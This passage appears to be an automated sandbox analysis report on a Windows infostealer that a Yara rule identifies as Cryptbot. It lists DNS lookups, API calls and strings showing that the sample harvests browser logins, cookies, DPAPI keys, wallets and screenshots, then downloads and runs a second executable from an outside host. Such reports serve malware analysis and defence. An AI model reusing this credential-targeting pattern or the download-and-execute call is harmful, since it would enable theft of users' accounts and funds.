Oct 13, 2021 03:22:41.080971956 CEST	8.8.8.8	192.168.2.4	0x2315	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:41.582231998 CEST	8.8.8.8	192.168.2.4	0xeea3	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:42.795219898 CEST	8.8.8.8	192.168.2.4	0xeea3	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:43.025391102 CEST	8.8.8.8	192.168.2.4	0xc7e8	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:44.356070042 CEST	8.8.8.8	192.168.2.4	0xa034	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:45.078459024 CEST	8.8.8.8	192.168.2.4	0xc7e8	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:46.001868010 CEST	8.8.8.8	192.168.2.4	0xa034	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:46.397176027 CEST	8.8.8.8	192.168.2.4	0x1da0	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:46.729011059 CEST	8.8.8.8	192.168.2.4	0x1da0	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:48.407321930 CEST	8.8.8.8	192.168.2.4	0x524e	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:49.749732018 CEST	8.8.8.8	192.168.2.4	0x524e	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:53.322173119 CEST	8.8.8.8	192.168.2.4	0xae31	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 03:22:54.397630930 CEST	8.8.8.8	192.168.2.4	0xae31	Server failure (2)	cemnit12.top	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: file.exe PID: 5940 Parent PID: 5908

General

Start time:	03:20:47
Start date:	13/10/2021
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\file.exe'
Imagebase:	0x400000
File size:	433664 bytes
MD5 hash:	6738381DDD3D2952312AF2A0F2BE5157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000002.929802806.0000000001840000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: file.exe PID: 5940 Parent PID: 5908 file.exeCOMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	12.1%
Signature Coverage:	20.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	80

Executed Functions

Function 0040DB70, Relevance: 172.9, APIs: 47, Strings: 51, Instructions: 1401registrysleepfileCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040DCA5
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040DD85
GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040DE4D
RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0040DEA4
RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?), ref: 0040DECB
RegQueryValueExW.KERNEL32(?,CurrentBuildNumber,00000000,00000000,?,?), ref: 0040DEE4
RegQueryValueExW.KERNEL32(?,ReleaseId,00000000,00000000,?,?), ref: 0040DEFD
RegCloseKey.KERNEL32(?), ref: 0040DF02
ExpandEnvironmentStringsW.KERNEL32(%WINDIR%\SysWOW64,?,00000208), ref: 0040DF19
GetFileAttributesW.KERNEL32(00000000), ref: 0040DF2C
GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 0040DFCE
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040E048
LocalAlloc.KERNEL32(00000040), ref: 0040E056
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040E061
GetLocaleInfoW.KERNEL32(?,00000002,?,00000200), ref: 0040E086
LocalFree.KERNEL32(?), ref: 0040E0EC
_strftime.LIBCMT ref: 0040E15E
_strftime.LIBCMT ref: 0040E17B
GetUserNameW.ADVAPI32(?,?), ref: 0040E1E6
GetComputerNameW.KERNEL32(?,00000206), ref: 0040E1F7
RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0040E265
RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 0040E288
RegCloseKey.ADVAPI32(?), ref: 0040E28D
RegOpenKeyExW.KERNEL32(80000002,SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000,00000000,00020119,?), ref: 0040E2A8
RegQueryValueExW.KERNEL32(?,DriverDesc,00000000,00000000,?,?), ref: 0040E2C5
RegCloseKey.ADVAPI32(?), ref: 0040E2CA
GetSystemInfo.KERNEL32(?), ref: 0040E2D7
GlobalMemoryStatusEx.KERNEL32(?), ref: 0040E2EE
GetSystemMetrics.USER32 ref: 0040E2FC
GetSystemMetrics.USER32 ref: 0040E302
CopyFileW.KERNEL32(?,?,00000000), ref: 0040E3F7
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E56C
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E63A
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E739
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E8E2
Sleep.KERNEL32(?), ref: 0040EB01
Sleep.KERNEL32(?), ref: 0040EB47
Sleep.KERNEL32(?), ref: 0040EC21
Sleep.KERNEL32(?), ref: 0040EC64
ExpandEnvironmentStringsW.KERNEL32(%Temp%\File.exe,00000000,00000208), ref: 0040EDD4
DeleteFileW.KERNEL32(00000000), ref: 0040EDDE
Sleep.KERNEL32(?), ref: 0040EE18
URLDownloadToFileW.URLMON(00000000,http://bojwfi01.top/download.php?file=lv.exe,00000000,00000000,00000000), ref: 0040EE2E
Sleep.KERNEL32(?), ref: 0040EE68
CreateFileW.KERNEL32(00000080,00000080,00000000,00000000,00000003,00000000,00000000), ref: 0040EE89
CloseHandle.KERNEL32(00000000), ref: 0040EE95
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0040EEAD

Strings

moresh01.top, xrefs: 0040EB49
\files_\system_info.txt, xrefs: 0040DD54
OS: %wS, xrefs: 0040DF64
(%wS), xrefs: 0040E233
%wS, xrefs: 0040DF84
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0040E3D5
UserName (ComputerName): %wS, xrefs: 0040E21E
Start Build: %wS, xrefs: 0040DE78
ProcessorNameString, xrefs: 0040E280
CurrentBuildNumber, xrefs: 0040DEDC
open, xrefs: 0040EEA6
%wS, xrefs: 0040E1A1, 0040E1B6
GPU: %wS, xrefs: 0040E360
wtRQ*v, xrefs: 0040ED44
w/RQu, xrefs: 0040ED89
.zip, xrefs: 0040E70E, 0040E8B7
Build: %wS, xrefs: 0040DF99
Total RAM: %I64d MB, xrefs: 0040E34E
\_Files, xrefs: 0040E53B
64-bit_(x64), xrefs: 0040DF72
h6D, xrefs: 0040E6C8
h6D, xrefs: 0040E5FA
j, xrefs: 0040E881
UTC: %z, xrefs: 0040E16A
%wS | , xrefs: 0040E0B1
h6D, xrefs: 0040E871
Release: %wS, xrefs: 0040DFAE
Display Resolution: %d x %d, xrefs: 0040E372
RQwv, xrefs: 0040ECF9
h6D, xrefs: 0040E522
cemnit12.top, xrefs: 0040EA20
DriverDesc, xrefs: 0040E2BD
CPU: %wS (Cores: %d), xrefs: 0040E32E
a+,ccs=UTF-16LE, xrefs: 0040DE5D, 0040DF49, 0040DFDE, 0040E016, 0040E096, 0040E186, 0040E203, 0040E30D, 0040E38C
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0040E25B
ReleaseId, xrefs: 0040DEF5
Keyboard Languages: , xrefs: 0040E02A
OS Language: %wS, xrefs: 0040DFF9
[Installed software], xrefs: 0040E3A0
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040DE9A
%WINDIR%\SysWOW64, xrefs: 0040DF14
%Temp%\File.exe, xrefs: 0040EDCF
%Temp%\, xrefs: 0040DC56, 0040DD41, 0040E527, 0040E5FF, 0040E6CD, 0040E876
32-bit_(x86), xrefs: 0040DF7B, 0040DF83
http://bojwfi01.top/download.php?file=lv.exe, xrefs: 0040EE27
ProductName, xrefs: 0040DEC3
SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, xrefs: 0040E29E
\_Files\_Information.txt, xrefs: 0040DC71
Local Date and Time: %Y-%m-%d %X, xrefs: 0040E14D
\files_, xrefs: 0040E60F
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0040E3B7, 0040E3C6

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$FileSleep$QueryValue$CloseName$OpenSystem$InfoKeyboardLayoutListLocalLocaleMetricsUser_strftime$AllocAttributesComputerCopyCreateDefaultDeleteDownloadExecuteFreeGlobalHandleMemoryModuleShellStatus
String ID: Local Date and Time: %Y-%m-%d %X$[Installed software]$ %wS$ Build: %wS$ Release: %wS$ (%wS)$%Temp%\$%Temp%\File.exe$%WINDIR%\SysWOW64$%wS$%wS | $.zip$32-bit_(x86)$64-bit_(x64)$CPU: %wS (Cores: %d)$CurrentBuildNumber$Display Resolution: %d x %d$DriverDesc$GPU: %wS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Keyboard Languages: $OS Language: %wS$OS: %wS$ProcessorNameString$ProductName$RQwv$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall$SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000$Start Build: %wS$Total RAM: %I64d MB$UTC: %z$UserName (ComputerName): %wS$\_Files$\_Files\_Information.txt$\files_$\files_\system_info.txt$a+,ccs=UTF-16LE$cemnit12.top$http://bojwfi01.top/download.php?file=lv.exe$h6D$h6D$h6D$h6D$moresh01.top$open$w/RQu$wtRQ*v$j
API String ID: 1785538002-1359323745
Opcode ID: 7cf1087107eb2c3ee2529d2794ba487ce2ca076c8f99e8df099a037e3fc621ed
Instruction ID: 254822e3e3d014b0c1d130a61bff6de9747d856b8ec4653272d1a1294d4e2b4b
Opcode Fuzzy Hash: 7cf1087107eb2c3ee2529d2794ba487ce2ca076c8f99e8df099a037e3fc621ed
Instruction Fuzzy Hash: 47B236B1E00208ABEB14DB64DD46BDE7779AF44304F10457AF404B72D2EB7DAA84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415BF0, Relevance: 128.2, APIs: 34, Strings: 39, Instructions: 412
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040AA30: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,73BCF9C0,00000000), ref: 0040AA82

ExpandEnvironmentStringsW.KERNEL32(%AppData%\andian,?,00000208,73B74770,73BCFE60), ref: 00415C31
GetFileAttributesW.KERNEL32(00000000), ref: 00415C40
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00415C60
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415C8D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00415CA2
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415CE2
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415D34
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415D86
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415DD8
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415E2A
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415E7C
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415ECE
CreateDirectoryW.KERNEL32(?,00000000), ref: 00415EEC
CreateDirectoryW.KERNEL32(?,00000000), ref: 00415EF8
CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F04
CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F10
CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F1C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F28
CreateDirectoryW.KERNEL32(?,00000000), ref: 00415F34
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415F74
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00415FC6
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00416018
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0041606A
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 004160BC
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 0041610E
ExpandEnvironmentStringsW.KERNEL32(00000000), ref: 00416160
CreateDirectoryW.KERNEL32(?,00000000), ref: 0041617E
CreateDirectoryW.KERNEL32(?,00000000), ref: 0041618A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00416196
CreateDirectoryW.KERNEL32(?,00000000), ref: 004161A2
CreateDirectoryW.KERNEL32(?,00000000), ref: 004161AE
CreateDirectoryW.KERNEL32(?,00000000), ref: 004161BA
CreateDirectoryW.KERNEL32(?,00000000), ref: 004161C6

Part of subcall function 00415BF0: ExpandEnvironmentStringsW.KERNEL32(%AppData%\,?,00000208), ref: 00414F0B
Part of subcall function 00415BF0: GetPrivateProfileStringW.KERNEL32 ref: 00414F4F
Part of subcall function 00415BF0: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00415030

Part of subcall function 0040DB70: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040DCA5

Part of subcall function 0040B220: ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\Desktop\*.txt,?,00000208,00000000,73B74770,00000000,004346F0,000000FF), ref: 0040B25B

Part of subcall function 0040DB70: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040E56C

Part of subcall function 0040EDC0: ExpandEnvironmentStringsW.KERNEL32(%Temp%\File.exe,00000000,00000208), ref: 0040EDD4
Part of subcall function 0040EDC0: DeleteFileW.KERNEL32(00000000), ref: 0040EDDE
Part of subcall function 0040EDC0: Sleep.KERNEL32(?), ref: 0040EE18
Part of subcall function 0040EDC0: URLDownloadToFileW.URLMON(00000000,http://bojwfi01.top/download.php?file=lv.exe,00000000,00000000,00000000), ref: 0040EE2E
Part of subcall function 0040EDC0: Sleep.KERNEL32(?), ref: 0040EE68
Part of subcall function 0040EDC0: CreateFileW.KERNEL32(00000080,00000080,00000000,00000000,00000003,00000000,00000000), ref: 0040EE89
Part of subcall function 0040EDC0: CloseHandle.KERNEL32(00000000), ref: 0040EE95
Part of subcall function 0040EDC0: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0040EEAD

ExitProcess.KERNEL32 ref: 004161F7

Strings

%AppData%\andian, xrefs: 00415C2C
\_Files\_Firefox\formhistory.sqlite, xrefs: 004151B8
%s\signons.sqlite, xrefs: 00414FBC
\_Files\_Firefox\logins.json, xrefs: 0041528C
Path, xrefs: 00414F45
\_Files\_Chrome, xrefs: 00415DAC
\_Files\_Firefox\cookies.sqlite, xrefs: 004150E4
\files_\_Firefox\logins.json, xrefs: 004157F6
\files_\_Firefox\signons.sqlite, xrefs: 004158CA
\_Files\_Firefox\key3.db, xrefs: 00415508
%wS\cookies.sqlite, xrefs: 00414F7D
\_Files\_Wallet, xrefs: 00415D5A
Profile0, xrefs: 00414F4A
\files_\_Chrome, xrefs: 0041603E
\files_\_Firefox\formhistory.sqlite, xrefs: 00415722
\_Files, xrefs: 00415CB6
%wS\Mozilla\Firefox\%wS, xrefs: 00414F63
%Temp%\, xrefs: 004150D4, 004151A8, 0041527C, 00415350, 00415424, 004154F8, 0041563E, 00415712, 004157E6, 004158BA, 0041598E, 00415A62, 00415C6E, 00415CB0, 00415D02, 00415D54, 00415DA6, 00415DF8, 00415E4A, 00415E9C, 00415F42, 00415F94, 00415FF1, 00416038, 0041608A, 004160DC, 0041612E
\files_\_Firefox\key3.db, xrefs: 00415A72
\_Files\_Opera, xrefs: 00415DFE
\_Files\_Firefox\key4.db, xrefs: 00415434
\files_\files, xrefs: 00415F9A
\files_\_Firefox, xrefs: 00416134
%s\logins.json, xrefs: 00414FA5
\_Files\_Firefox\signons.sqlite, xrefs: 00415360
\files_\cryptocurrency, xrefs: 00415FE7
%s\key4.db, xrefs: 00414FDC
%s\key3.db, xrefs: 00414FED
\files_\_Firefox\key4.db, xrefs: 0041599E
%AppData%\, xrefs: 00414F06
\files_\_Firefox\cookies.sqlite, xrefs: 0041564E
\_Files\_Firefox, xrefs: 00415EA2
%wS\Mozilla\Firefox\profiles.ini, xrefs: 00414F14
\files_\_Opera, xrefs: 00416090
\files_\_Brave, xrefs: 004160E2
\_Files\_Files, xrefs: 00415D08
\files_, xrefs: 00415F48
%wS\formhistory.sqlite, xrefs: 00414F8E
\_Files\_Brave, xrefs: 00415E50

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$Create$Directory$File$Sleep$AttributesCloseDeleteDownloadExecuteExitHandleOpenPrivateProcessProfileShellString
String ID: %AppData%\$%AppData%\andian$%Temp%\$%s\key3.db$%s\key4.db$%s\logins.json$%s\signons.sqlite$%wS\Mozilla\Firefox\%wS$%wS\Mozilla\Firefox\profiles.ini$%wS\cookies.sqlite$%wS\formhistory.sqlite$Path$Profile0$\_Files$\_Files\_Brave$\_Files\_Chrome$\_Files\_Files$\_Files\_Firefox$\_Files\_Firefox\cookies.sqlite$\_Files\_Firefox\formhistory.sqlite$\_Files\_Firefox\key3.db$\_Files\_Firefox\key4.db$\_Files\_Firefox\logins.json$\_Files\_Firefox\signons.sqlite$\_Files\_Opera$\_Files\_Wallet$\files_$\files_\_Brave$\files_\_Chrome$\files_\_Firefox$\files_\_Firefox\cookies.sqlite$\files_\_Firefox\formhistory.sqlite$\files_\_Firefox\key3.db$\files_\_Firefox\key4.db$\files_\_Firefox\logins.json$\files_\_Firefox\signons.sqlite$\files_\_Opera$\files_\cryptocurrency$\files_\files
API String ID: 820267607-3351232602
Opcode ID: 590af48cf1a46fa54088ddcb9384379e6d0ee002ea2df3c89b367fcc22eff2ec
Instruction ID: 55fb6321524328c086458930c7ba30cc0fcf9cd4176fa1aeff9e66a68de170c6
Opcode Fuzzy Hash: 590af48cf1a46fa54088ddcb9384379e6d0ee002ea2df3c89b367fcc22eff2ec
Instruction Fuzzy Hash: E7D19275A1430166E620FB71CC46A9FB7989FA4348F40483EF449A21E7EF3DE60DC65A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD20, Relevance: 51.1, APIs: 25, Strings: 4, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208,00000000,73AFE730), ref: 0040ADA4

Strings

%Temp%\, xrefs: 0040AD59, 0040AE40
image/jpeg, xrefs: 0040B124
\_Files\_Screen_Desktop.jpeg, xrefs: 0040AD70
\files_\screenshot.jpg, xrefs: 0040AE50

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: %Temp%\$\_Files\_Screen_Desktop.jpeg$\files_\screenshot.jpg$image/jpeg
API String ID: 237503144-1383429242
Opcode ID: f6afea1c73b2c4c2b044752672ac31201067c2b0b89293c78fcd6b11750ac7c7
Instruction ID: 1522f25109f37b898f11d4a3a15fb65eff52795cbdccf4546b361e04eb0b9b7a
Opcode Fuzzy Hash: f6afea1c73b2c4c2b044752672ac31201067c2b0b89293c78fcd6b11750ac7c7
Instruction Fuzzy Hash: 46C17AB1D002199BDB20DFA4CD49BAEBBB5FF08704F10416AE509B7290D7799A44CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00414000, Relevance: 35.8, APIs: 10, Strings: 10, Instructions: 799
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.arj, xrefs: 00414177
.zoo, xrefs: 00414141
in-gdi-devcaps-l1-1-0, xrefs: 0041402A
.gz, xrefs: 00414189
K, xrefs: 00414872
.arc, xrefs: 00414153
.lzh, xrefs: 00414165
UT, xrefs: 004143AA
.zip, xrefs: 0041412F
.tgz, xrefs: 0041419B

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo$K$UT$in-gdi-devcaps-l1-1-0
API String ID: 0-4262956999
Opcode ID: f03331c6ac05f747e4f7f4c986c34046f026abb5f3e244967c3a46c6bcb45a45
Instruction ID: 9e89e10497af72fa126ed8da9896f6259446c266e342fc3784c8ba1e4e575486
Opcode Fuzzy Hash: f03331c6ac05f747e4f7f4c986c34046f026abb5f3e244967c3a46c6bcb45a45
Instruction Fuzzy Hash: 1652C2716043408BDB24DF29D8817ABBBE4AF95305F04056EFD84CB382D779D989CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401220, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 280
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32(?), ref: 00401234
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401250
GetFileSizeEx.KERNEL32(00000000,?), ref: 00401267
CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040128E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 004012A4
CloseHandle.KERNEL32(00000000), ref: 004012B5
CloseHandle.KERNEL32(00000000), ref: 004012B8
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040148E
LocalFree.KERNEL32(?), ref: 004014BB
UnmapViewOfFile.KERNEL32(00000000), ref: 0040150E
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040151B
CloseHandle.KERNEL32(00000000), ref: 00401526

Strings

DPAPI, xrefs: 0040144B
os_crypt, xrefs: 00401310
encrypted_key, xrefs: 0040133C

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: File$Close$Handle$CreateView$AttributesChangeCryptDataFindFreeLocalMappingNotificationSizeUnmapUnprotect
String ID: DPAPI$encrypted_key$os_crypt
API String ID: 3228393713-3106839558
Opcode ID: cd02580d7a1e1de45017eb1408fbbe76704b4724033a608b9f5f22f3c3f17c59
Instruction ID: f7559763435f93ac33515ea846f2b948309a20a6e1d57b0678ee0fb662a16498
Opcode Fuzzy Hash: cd02580d7a1e1de45017eb1408fbbe76704b4724033a608b9f5f22f3c3f17c59
Instruction Fuzzy Hash: 819104715043406FE7209F6488C4B6B7BE8AB86354F08457EF985A73A2D639DC09C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E3, Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 269
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32(?), ref: 0040A6EA
GetFileAttributesW.KERNEL32(00000000), ref: 0040A73C
GetSystemInfo.KERNEL32(?), ref: 0040A784
KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040A799
GlobalMemoryStatusEx.KERNEL32(?), ref: 0040A7BB
RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 0040A820
RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,?,?), ref: 0040A841
RegCloseKey.KERNEL32(?), ref: 0040A84A

Strings

ProcessorNameString, xrefs: 0040A839
Xeon, xrefs: 0040A923
aH, xrefs: 0040A88A
@, xrefs: 0040A7B0
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0040A816

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile$CallbackCloseDispatcherGlobalInfoMemoryOpenQueryStatusSystemUserValue
String ID: @$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$Xeon$aH
API String ID: 3694004270-2543718681
Opcode ID: 7db4a608c25a5fe6603510fc05f852b889ef91ee5e868d81ed31fb5a9d213069
Instruction ID: a11e35099914a2f539c488e99af5bd2085348f9a9993ce1602002415f301acf8
Opcode Fuzzy Hash: 7db4a608c25a5fe6603510fc05f852b889ef91ee5e868d81ed31fb5a9d213069
Instruction Fuzzy Hash: A8914771A003089BDB24DB68CC89BEEB7B5AF05314F14067AE545F32C1D73CA995CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA30, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 158
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,73BCF9C0,00000000), ref: 0040AA82
RegCloseKey.KERNEL32(?,?,73BCF9C0,00000000), ref: 0040AAB4
RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,?,?,73BCF9C0,00000000), ref: 0040AAE8

Strings

%Temp%\, xrefs: 0040AB98
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040AA78
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0040AADE

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Open$Close
String ID: %Temp%\$HARDWARE\DESCRIPTION\System\CentralProcessor\0$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3083169812-543569672
Opcode ID: 66a16b0f935fb420fa7c91cd940e6ca25ca8ab4681ea2d4e824e6ab3cb95ddac
Instruction ID: 0b16ead8e416f8bf484ad7ef3fd71992627c41dd9fe8b2a19809a379e06530f0
Opcode Fuzzy Hash: 66a16b0f935fb420fa7c91cd940e6ca25ca8ab4681ea2d4e824e6ab3cb95ddac
Instruction Fuzzy Hash: AE51A471A40208ABEB14DBA4DD89FEEB779FB04304F50412AF505B32D1DB79A944CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00429D74, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 376
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00429DF6
_free.LIBCMT ref: 00429E1A
_free.LIBCMT ref: 00429FAA
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00437808), ref: 00429FBC
_free.LIBCMT ref: 0042A176

Strings

W. Europe Standard Time, xrefs: 0042A02B
W. Europe Daylight Time, xrefs: 0042A05A

Memory Dump Source

Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID: W. Europe Daylight Time$W. Europe Standard Time
API String ID: 597776487-986674615
Opcode ID: 04baa45bb794c6948986b68f16345ab8c7a043a9fa62eca1b11e06e5ce84db47
Instruction ID: a6e2c3d1f052aa010b56476cffde206d69b75fc2ff59e3c17518a7db361cc370
Opcode Fuzzy Hash: 04baa45bb794c6948986b68f16345ab8c7a043a9fa62eca1b11e06e5ce84db47
